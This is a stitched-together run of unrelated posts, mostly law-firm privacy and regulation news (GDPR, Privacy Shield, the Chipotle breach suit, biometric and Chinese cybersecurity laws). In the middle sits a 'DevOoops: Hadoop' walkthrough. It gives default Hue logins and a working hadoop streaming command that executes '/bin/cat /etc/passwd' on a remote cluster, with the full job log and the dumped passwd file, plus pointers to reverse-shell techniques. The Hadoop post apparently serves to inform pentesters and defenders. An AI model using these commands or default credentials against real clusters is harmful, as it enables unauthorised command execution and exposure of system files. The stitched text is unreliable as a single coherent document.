Every team in the Offensive Cyber Security Supply Chain needs to work together but without knowing external team targets. Every team is charged of specific goals. Communication  artifacts, sharing tools, operational tools play fundamental roles in getting things done.  A talented supervisor is needed in order to get smooth communication between teams and to organize the overall supply chain. This is one of the most important roles who must belong to a great leader be able o deal with super talented and technical people. The supervisor should know very well: methodologies, processes, best practices and he shall have a brilliant view of the overall scenario. He shall have an intensive technical and hacking background and he should never stop to learn from other members. Great communication skills are required in order to develop leadership.

My post was about Offensive Cyber Security Supply Chain. The goal of this quick blog post was to move forward common blue teams and defense agencies by increasing their awareness on how OCSSC should be made in 2017. We are currently experiencing a big move forward in OCSSC from single talented individuals to well structured and organized supply chains, we need to enforce and to structure defenses as well.  







CIPL Issues Recommendations for Implementing Transparency, Consent and Legitimate Interest under the GDPR

Recently, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP issued a white paper on Recommendations for Implementing Transparency, Consent and Legitimate Interest under the GDPR (the “White Paper”). The White Paper sets forth guidance and recommendations on the key concepts of transparency, consent and legitimate interest under the EU General Data Protection Regulation (“GDPR”).

Transparency

One of the main objectives of the GDPR is the empowerment of individuals and transparency is a prerequisite to meet this objective. However, there is a growing gap between legal transparency through traditional and lengthy privacy policies and notices and user-centric transparency. CIPL recommends that transparency under the GDPR be user-centric. Therefore, when implementing transparency, the focus should be on informing users through providing meaningful information in concise and intelligible formats.

Additional recommendations in the White Paper include:

  • The GDPR links transparency to fair processing and therefore ensuring effective transparency is critical for establishing and maintaining trust and digital confidence among data subjects.
  • The concept of transparency under the GDPR is broader than privacy notices and should include all mechanisms used to communicate data uses to an individual.
  • Transparency has a role in setting the reasonable expectations of individuals regarding the use of their data and should be an intrinsic part of any consent.
  • Transparency is an essential element of organizational accountability and data protection authorities should incentivize diverse user-centric transparency and showcase best practices.
  • Transparency must be embedded as much as possible within the relevant product, service, process or technology to avoid creating unnecessary burdens on individuals.
  • Algorithmic transparency should be focused on the broad logic involved rather than attempting full transparency to the individual through explaining the intricacies of the algorithm itself.
  • Transparency cannot be absolute and may be limited by trade secrets, commercial and competition considerations as well as by rights of others and the public interest.

Consent

Consent is on equal footing with other processing grounds under the GDPR and should not be overused inappropriately. Different implementations around the age of consent for children are causing concern as this could undermine the harmonization objective of the GDPR.

Additional recommendations include:

  • Consent should be used as a legal ground for processing in situations where it is possible to provide clear and understandable information at the right time and individuals have a genuine choice concerning the use of their personal data.
  • Overreliance on consent creates consent fatigue for individuals. Use of consent as a grounds for processing must be in line with the requirements of the GDPR and adapted to the modern information age.
  • Explicit consent is only required for certain processing.
  • Pre-GDPR consents should continue to be valid if obtained in compliance with the EU Directive and national law, subject to certain exceptions addressed in the White Paper. Organizations should not have to re-paper existing consent until there is a material change in processing and its purposes.
  • EU Member States should take a harmonized approach regarding the age of consent for children. The age should be 13.
  • There are concerns about the predominance of consent in the ePrivacy Rules. The EU legislator should introduce the concept of legitimate interest into the ePrivacy Regulation.

Legitimate Interest

In situations where consent is deemed impractical or ineffective, other grounds for processing may be used in its place, including the concept of legitimate interest. Legitimate interest may be the most accountable basis for data processing in many contexts, as it requires an assessment and balancing of the risks and benefits of processing for organizations, individuals and society. It also requires the implementation of appropriate mitigations to reduce or eliminate any unreasonable risks.

Additional recommendations include:

  • Legitimate interest is an essential basis for data processing and ensures the GDPR remains future-proof and technology neutral.
  • Legitimate interest places the burden of protecting individuals on the organization, which is in the best position to undertake a risk/benefits analysis and to devise appropriate mitigations.
  • A general non-exhaustive “database” of legitimate interest processing cases may facilitate proper implementation of this requirement in the future.
  • Legitimate interest facilitates low-impact data processing.
  • Legitimate interest does not provide a carte blanche for processing.
  • The reasonable expectations of the individual are a relevant factor in the legitimate interest balancing test. However, even if proposed processing is not within the reasonable expectations of the individual, the balancing test may still validate the processing, such as where the public interest or other factors may support an unexpected use. Further, reasonable expectations may change over time and the balancing test must take these changes into account.

The White Paper was developed in the context of CIPL’s ongoing GDPR Implementation Project, a multi-year initiative involving research, workshops, webinars and white papers, supported by over 80 private sector organizations, with active engagement and participation by many EU-based data protection and governmental authorities, academics and other stakeholders.

EU Commission Issues Questionnaire in Preparation for Annual Review of Privacy Shield

On June 2, 2017, in preparation for the first annual review of the EU-U.S. Privacy Shield (“Privacy Shield”) framework, the European Commission has sent questionnaires to trade associations and other groups, including the Centre for Information Policy Leadership at Hunton & Williams LLP, to seek information from their Privacy Shield-certified members on the experiences of such organizations during the first year of the Privacy Shield. The EU Commission intends to use the questionnaire responses to inform the annual review of the function, implementation, supervision and enforcement of the Privacy Shield.

Among other focus areas, the questionnaire seeks information on how Privacy Shield-certified entities have:

  • implemented policies, procedures and other measures to meet their Privacy Shield obligations and each of the Privacy Shield Principles;
  • modified their business and contractual arrangements with third parties to ensure that the third parties appropriately protect the personal information they receive from Privacy Shield-certified organizations;
  • addressed complaints (if any) from individuals whose personal information has been transferred pursuant to the Privacy Shield; and
  • addressed the requirement to select an independent dispute resolution mechanism.

The questionnaire also asks for Privacy Shield-certified organizations’ views on:

  • the issuance of transparency reports, pursuant to the USA Freedom Act, regarding U.S. authorities’ national security-related access requests;
  • the extent to which personal information transferred pursuant to the Privacy Shield is used for automated decision-making in connection with decisions that might significantly affect individuals’ rights or obligations;
  • developments in U.S. law that might affect the EU Commission’s assessment of the Privacy Shield; and
  • challenges that such organizations have encountered in meeting the Privacy Shield’s requirements.

Responses to the questionnaire are due to the EU Commission by July 5, 2017.

DevOoops: Hadoop

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."
from: http://hadoop.apache.org/

If you've ever heard of MapReduce...you've heard of Hadoop.

NFI what i'm talking a bout? Here is a 3minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QY

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny zeronights talk:



Hue

Common defaults admin/admin, cloudera/cloudera



Although occasionally you'll find one that will just let you pick your own :-)

If you gain access, full HDFS access, run queries, etc


HDFS WebUI
HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).





From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.





update:The hadoop attack library is worth checking out.
https://github.com/wavestone-cdt/hadoop-attack-library

Most up-to-date presentation on hadoop attack library: https://www.slideshare.net/phdays/hadoop-76515903

There is a piece around RCE (https://github.com/CERT-W/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands)

You'll need info found in ip:50070/conf





TLDR; find the correct open Hadoop ports and run a map reduce job against the remote hadoop server. 
You need to be able to access the following Hadoop services through the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download file: usually on port 50010


Let's see it in action:


lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job: http://nope.members.linode.com:8088/proxy/application_1483672290130_0001/
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 3 items
-rw-r--r--   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001

lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
hduser:x:1000:1000:,,,:/home/hduser:/bin/bash



http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

Walks you thru how to get reverse shells or meterpreter shells (windows) if you can run commands.




Resources:
http://2015.zeronights.org/assets/files/03-Kaluzny.pdf

video of above talk from appsecEU 2015 https://www.youtube.com/watch?v=ClXKGI8AzTk
http://hackedexistence.com/downloads/Cloud_Security_in_Map_Reduce.pdf

https://media.blackhat.com/bh-us-10/presentations/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-slides.pdf 

https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf

https://github.com/CERT-W/hadoop-attack-library

https://www.sans.org/score/checklists/cloudera-security-hardening

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

http://www.cloudera.com/documentation/enterprise/latest/topics/cdh_ig_ports_cdh5.html


What did I miss?  Anything to add?

CIPL Submits Comments to the Working Party’s Proposed GDPR DPIA Guidelines

The Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP recently submitted formal comments (“Comments”) to the Article 29 Working Party’s (“Working Party’s”) Guidelines on Data Protection Impact Assessment (DPIA) and determining whether processing is “likely to result in a high risk” for the purposes of Regulation 2016/679 (“DPIA Guidelines”) that were adopted on April 4, 2017. CIPL’s Comments follow its December 2016 white paper on Risk, High Risk, Risk Assessments and Data Protection Impact Assessments under the GDPR, which CIPL had submitted to the Working Party as formal initial input to its development of DPIAs and “high-risk” guidance.

CIPL’s Comments highlight the importance of preserving the DPIA’s special role as an accountability tool for high-risk processing under the EU General Data Protection Regulation (“GDPR”). CIPL acknowledges and appreciates the Working Party’s recognition that DPIAs and the notion of high risk are context specific and that organizations must have flexibility to devise risk assessment frameworks appropriate to them. To that effect, CIPL welcomes the Working Party’s inclusion of criteria for identifying high risk, as opposed to relying on a fixed list of high-risk processing activities.

CIPL’s Comments emphasize, however, that clarity is needed regarding several criteria put forward by the Working Party for determining whether a type of processing is high risk. This is especially true because such processing renders the DPIA requirement mandatory. CIPL’s Comments also recommend some additional elements for the Working Party to consider in the assessment of risk, including benefits of the processing and consent.

CIPL’s Comments also underline several key issues that it believes were insufficiently addressed by the DPIA Guidelines or which may require reconsideration, including:

  • The role of DPIAs in the context of joint data controllers and data processors, and the treatment of such entities’ intellectual property and confidential information;
  • data controllers’ reliance on existing DPIAs for newly implemented features or software across different products, and DPIAs for new technologies generally;
  • problems associated with several proposed “high-risk” criteria;
  • the importance of considering the benefits of processing in the context of DPIAs and risk assessments;
  • GDPR requirements where data controllers choose not to conduct a DPIA and instances where DPIAs are not required;
  • frequency of DPIAs and retiring existing DPIAs;
  • potential burdens imposed by seeking the views of data subjects and their representatives when carrying out a DPIA;
  • the roles of GDPR certifications, seals and marks, as well as BCRs and codes of conduct, when assessing the impact of a data processing operation.
  • the scope of rights to be included in a DPIA; and
  • burdens and risks associated with publishing DPIAs and the consequences of not publishing.

CIPL’s Comments were developed based on input by the private sector participants in CIPL’s ongoing GDPR Implementation Project, which includes more than 80 individual private sector organizations. As part of this initiative, CIPL will continue to provide formal input about other GDPR topics the Working Party prioritizes.

Chipotle Payment Card Data Breach: Financial Institutions File Leapfrog Suit

On May 26, 2017, Alcoa Community Federal Credit Union (“Alcoa”), on behalf of itself, credit unions, banks and other financial institutions, filed a nationwide class action against Chipotle Mexican Grill, Inc. (“Chipotle”). The case arises from a breach of customer payment card data. The putative class consists of all such financial institutions that issued payment cards, or were involved with card-issuing services, for customers who made purchases at Chipotle from March 1, 2017, to the present. Plaintiffs allege a number of “inadequate data security measures,” including Chipotle’s decision not to implement EMV technology. 

Alcoa asserts claims for negligence and negligence per se. Both claims rest on, among other bases, a purported violation of Section 5 of the FTC Act. Alcoa also requests declaratory and injunctive relief. The alleged damages include the costs of providing replacement cards, costs for consumer fraud monitoring, reimbursement of fraudulent charges, and costs due to lost interest and transaction fees due to reduced card usage.

Very few financial institution cases have been filed in the wake of consumer data breaches. However, such cases have been increasing due to a number of payment card data breaches in fairly rapid succession, including many massive breaches. These circumstances can create added costs for financial institutions that may not be fully recoverable through their direct relationships with the card brands. Additionally, because the financial institutions typically do not have contractual relationships with the breached merchants, some have chosen to leapfrog the various recovery processes established by the card brands by alleging non-contractual common law tort claims such as negligence and negligence per se.

Enterprise Security Weekly #47 – You Burn, You Learn

Corey Bodzin of Tenable joins us. In the news, the power of exploits, Carbon Black’s open letter to Cylance, security measures increase due to ransomware attacks, and more in this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode47Visit https://www.securityweekly.com for all the latest episodes!

Washington Becomes Third State to Enact Biometric Privacy Law

On May 16, 2017, the Governor of the State of Washington, Jay Inslee, signed into law House Bill 1493 (“H.B. 1493”), which sets forth requirements for businesses who collect and use biometric identifiers for commercial purposes. The law will become effective on July 23, 2017. With the enactment of H.B. 1493, Washington becomes the third state to pass legislation regulating the commercial use of biometric identifiers. Previously, both Illinois and Texas enacted the Illinois Biometric Information Privacy Act (740 ILCS 14) (“BIPA”) and the Texas Statute on the Capture or Use of Biometric Identifier (Tex. Bus. & Com. Code Ann. §503.001), respectively.

H.B. 1493 defines “biometric identifier” as data generated by automatic measurements of an individual’s biological characteristics, such as a fingerprint, voiceprint, eye retinas, irises or other unique biological patterns or characteristics that are used to identify a specific individual. Interestingly, unlike the Illinois and Texas statutes, H.B. 1493’s definition of “biometric identifier” does not reference a record or scan of face geometry (i.e., facial recognition data). The definition also explicitly excludes “physical or digital photographs, video or audio recording or data generated therefrom,” and certain health-related data processed pursuant to Health Insurance Portability and Accountability Act of 1996. Notably, several putative class action lawsuits have been filed against social networking sites, such as Shutterfly, for allegedly using facial recognition technology to scan users’ uploaded photographs in violation of BIPA’s notice and consent requirements. Although it is unclear whether H.B.1493 covers scans of face geometry, the lack of explicit inclusion of such data may be a response to such lawsuits.

Pursuant to H.B.1493, a person may not “enroll” a biometric identifier in a database for a commercial purpose without first providing notice, obtaining consent or providing a mechanism to prevent the subsequent use of a biometric identifier for a commercial purpose. In contrast to the Illinois and Texas statutes, which broadly regulate the capture (or, in the case of BIPA, the possession) of biometric identifiers, Washington’s statute is limited to those persons that “enroll” biometric identifiers by capturing the data, converting it into a reference template that cannot be reconstructed into the original output image, and storing it in a database that matches the biometric identifier to a specific individual. Notably, the statute’s limitations on disclosure and retention of biometric identifiers do not apply to biometric identifiers that have been “unenrolled.”

H.B. 1493 contains detailed requirements governing the enrollment of biometric identifiers for a commercial purpose, as well as the subsequent disclosure of such data. In particular:

  • The statute makes it clear that the notice required under the law is separate from, and is not considered, “affirmative consent.”
  • Unlike BIPA, which explicitly requires a written release from the subject before obtaining his or her biometric identifier, H.B. 1493 broadly states that the exact notice and type of consent required to achieve compliance is “context-dependent.” The notice must be given through a procedure reasonably designed to be readily available to affected individuals.
  • A person who enrolls a biometric identifier for a commercial purpose or obtains a biometric identifier from a third party for a commercial purpose may not use or disclose it in a manner that is materially inconsistent with the terms under which the biometric identifier was originally provided without obtaining consent for the new use or disclosure.
  • Unless consent has been obtained, a person who has enrolled an individual’s biometric identifier may not sell, lease or otherwise disclose the biometric identifier to another person for a commercial purpose unless one of certain enumerated statutory exceptions applies, including: (1) where necessary to provide a product or service requested by the individual; or (2) where disclosed to a third party who contractually promises that the biometric identifier will not be further disclosed and will not be enrolled in a database for a commercial purpose that is inconsistent with the notice and consent provided.

Importantly, unlike the Illinois and Texas statutes, H.B. 1493 contains a broad “security exception,” exempting those persons that collect, capture, enroll or store biometric identifiers in furtherance of a “security purpose.”

Similar to the Illinois and Texas statutes, H.B. 1493 also contains data security and retention requirements. In particular, the statute requires (1) reasonable care to guard against unauthorized access to and acquisition of biometric identifiers and (2) retention of biometric identifiers for no longer than necessary to comply with the law, protect against fraud, criminal activity, security threats or liability, or to provide the service for which the biometric identifier was enrolled.

As with the Texas biometric law, H.B. 1493 does not create a private right of action to allow for suits by individual plaintiffs. Instead, only the Washington Attorney General can enforce the requirements. The Illinois biometric law currently is the only state biometric statute that includes a private right of action.

Although Washington is only the third state to enact a biometric privacy law, several other states are considering similar legislation as the commercial collection and use of biometric identifiers becomes more commonplace.

Cybersecurity Law Goes Into Effect in China

On June 1, 2017, the new Cybersecurity Law went into effect in China. This post takes stock of (1) which measures have been passed so far, (2) which ones go into effect on June 1 and (3) which ones are in progress but have yet to be promulgated.

A draft implementing regulation and a draft technical guidance document on the treatment of cross-border transfers of personal information have been circulated, but at this time only the Cybersecurity Law itself and a relatively specific regulation (applicable to certain products and services used in network and information systems in relation to national security) have been finalized. As such, only the provisions of the Cybersecurity Law itself and this relatively specific regulation went into effect on June 1.

On June 1, 2017, the following obligations (among others) become legally mandatory for “network operators” and “providers of network products and services”:

  • personal information protection obligations, including notice and consent requirements;
  • for “network operators,” obligations to implement cybersecurity practices, such as designating personnel to be responsible for cybersecurity, and adopting contingency plans for cybersecurity incidents; and
  • for “providers of network products and services,” obligations to provide security maintenance for their products or services and to adopt remedial measures in case of safety defects in their products or services.

Penalties for violating the Cybersecurity Law can vary according to the specific violation, but typically includes (1) a warning, an order to correct the violation, confiscation of illegal proceeds and/or a fine (typically ranging up to RMB 1 million); (2) personal fines for directly responsible persons (typically ranging up to RMB 100,000); and (3) in particularly serious circumstances, suspensions or shutdowns of offending websites and businesses, including revocations of operating permits and business licenses.

A final version of the draft implementing regulation and a draft technical guidance document on the treatment of cross-border transfers of personal information are forthcoming. When issued, they are expected to finalize and clarify the following prospective obligations:

  • restrictions on cross-border transfers of personal information (and “important information”), including a notice and consent obligation specific to cross-border transfers; and
  • procedures and standards for “security assessments,” which validate the continuation of cross-border transfers of personal information and “important information.”

The draft version of the implementing regulation on the treatment of cross-border transfers of personal information contains a grace period, under which “network operators” would not be required to comply with the cross-border transfer requirements until December 31, 2018. The final draft likely will contain a similar grace period.

Colorado Publishes Cybersecurity Regulations for Financial Institutions

Recently, the Colorado Division of Securities (the “Division”) published cybersecurity regulations for broker-dealers and investment advisers regulated by the Division. Colorado’s cybersecurity regulations follow similar regulations enacted in New York that apply to certain state-regulated financial institutions.

The regulations obligate covered broker-dealers and investment advisers to establish and maintain written cybersecurity procedures designed to protect “confidential personal information” which is defined to include a Colorado resident’s first name or first initial and last name, plus (1) Social Security number; (2) driver’s license number or identification card number; (3) account number or credit or debit card number, in combination with any required security code, access code or password that would permit access to a resident’s financial account; (4) digitized or other electronic signature or (5) user name, unique identifier or electronic mail address in combination with a password, access code security question or other authentication information that would permit access to an online account.

The cybersecurity procedures must include:

  • an annual assessment by the firm or an agent of the firm of the potential risks and vulnerabilities to the confidentiality, integrity and availability of confidential personal information;
  • the use of secure email for email containing confidential personal information, including use of encryption and digital signatures;
  • authentication practices for employee access to electronic communications, databases and media;
  • procedures for authenticating client instructions received via electronic communication; and
  • disclosure to clients of the risks of using electronic communications.

In determining whether a firm’s cybersecurity procedures are reasonably designed, the Division may consider the firm’s size, relationships with third parties and cybersecurity policies and procedures. The Division may also consider the firm’s (1) authentication practices, (2) use of electronic communications, (3) use of automatic locking mechanisms for devices that have access to confidential personal information and (4) process for reporting lost or stolen devices.

The Colorado Secretary of State will set an effective date for the Colorado regulations after the Colorado Attorney General’s office issues an opinion on the regulations.

UK ICO Stresses Importance of Preparing for the GDPR and Addresses the ICO’s Role Post-Brexit

With just under one year to go before the EU General Data Protection Regulation (“GDPR”) becomes law across the European Union, the UK Information Commissioner’s Office (“ICO”) has continued its efforts to help businesses prepare for the new law. The ICO also has taken steps to address its own role post-Brexit.

In a YouTube video published on May 25, 2017, Information Commissioner Elizabeth Denham stressed the importance of preparing for the GDPR, warning that companies risk enforcement action – and the inevitable reputational and financial damage that follows—if they do not make data protection a cornerstone of their business policies and practices.

The ICO also published guidance materials for organizations grappling with the GDPR’s requirements. This includes an updated (1) data protection self-assessment toolkit for small and medium-sized enterprises, which introduces an element aimed at helping organizations chart their GDPR compliance progress and (2) 12 steps to take now guidance.

On May 25, 2017, the ICO also unveiled its Information Rights Strategic Plan 2017-2021 (the “Plan”). The Plan outlines five goals:

  • increase the public’s trust and confidence in how data is used and made available;
  • improve standards of information rights practices through clear, inspiring and targeted engagement and influence;
  • maintain and develop influence within the global information rights regulatory community;
  • stay relevant, provide excellent public service and keep abreast of evolving technology; and
  • enforce the laws the ICO helps to shape and oversee.

Acknowledging that the ICO’s role within Europe will change when the UK leaves the European Union, and will bring with it a number of challenges, the Plan nevertheless stresses that the ICO will continue to play a full part in EU data protection working groups and boards until Brexit. It will work closely with EU partners post-Brexit as well, including the European Data Protection Board (on which, post-Brexit, the ICO will lose its seat). The ICO also pledges to work closely with the UK government to define its role in any transitional arrangements immediately following the UK’s departure from the EU.

The European Commission has also released a statement marking the GDPR’s one year to go milestone. According to the statement, the European Commission pledges to work with EU Member States and engage with companies to ensure that individuals are aware of their rights and businesses are prepared for their new compliance obligations.